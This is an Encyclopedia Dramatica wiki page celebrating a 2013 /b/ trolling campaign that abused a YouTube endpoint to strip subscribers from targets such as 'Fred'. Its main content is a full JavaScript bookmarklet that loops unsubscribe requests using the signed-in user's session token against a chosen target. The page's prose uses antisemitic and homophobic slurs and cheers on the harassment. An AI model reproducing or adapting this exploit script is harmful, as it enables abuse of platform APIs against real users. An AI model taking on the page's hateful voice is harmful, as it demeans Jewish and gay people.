Registration has been disabled and the moderation extension has been turned off.
Contact an admin on Discord or EDF if you want an account. Also fuck bots.

YouTube Subscriber Hack

From Encyclopedia Dramatica
This is the current revision of this page, as edited by imported>Mr Jonzz at 05:08, 18 July 2013. The present address (URL) is a permanent link to this version.
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
Hey! This article isn't lulz just yet, but its coverage can spark a lollercoaster.
You can help by reverting people who delete shit, and vandalizing their user pages.
See this article on Google? Want to add something? Join us!

Last Thursday, the Script Kiddies of /b/ found yet another loophole in the shit coding of JewTube. Suddenly subscriber counts were dropping like Balls. People like Fred and Justin Bieber had the cocks ripped off them, as their subscriber counts dropped to 0. The butthurt jews decided to continue to subscribe, to try and bring his count back up. No such luck.

Btards would copy and paste this code into their address bar while signed into YouTube. From there they picked their target (default is Fred), hit the okay button two more times, and presto! Fred gets fucked. The Btards then left it open in a tab while going back to their usual slumber. Fred was now not #1.

YouTube disabled the newly-discovered method and restored Fred's subscribers and lowered the counts the Fags who increased their subscriber count by reversing the script.


The Code

javascript:function unsubscribe() {
    httpreq=new XMLHttpRequest();
    httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
    httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
    if(!httpreq.responseXML) {
        setTimeout('unsubscribe()', timeout);
        return;
    }
    if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') {
        alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
    } else if((window.status=++count)!=times) {
        setTimeout('unsubscribe()', timeout);
    } else {
        alert('DUN');
    }
}
count=0;
if((username=prompt('enter target\'s username', 'Fred'))!=null) {
    if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
        if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
            unsubscribe();
        }
    }
}
void(0);

The Result

This section requires restoration - Please see the talkpage.


The Response

Related Articles



YouTube Subscriber Hack is part of a series on YouTube.

Visit the YouTube Portal

YouTube Subscriber Hack is part of a series on

Trolls

Visit the Trolls Portal for complete coverage.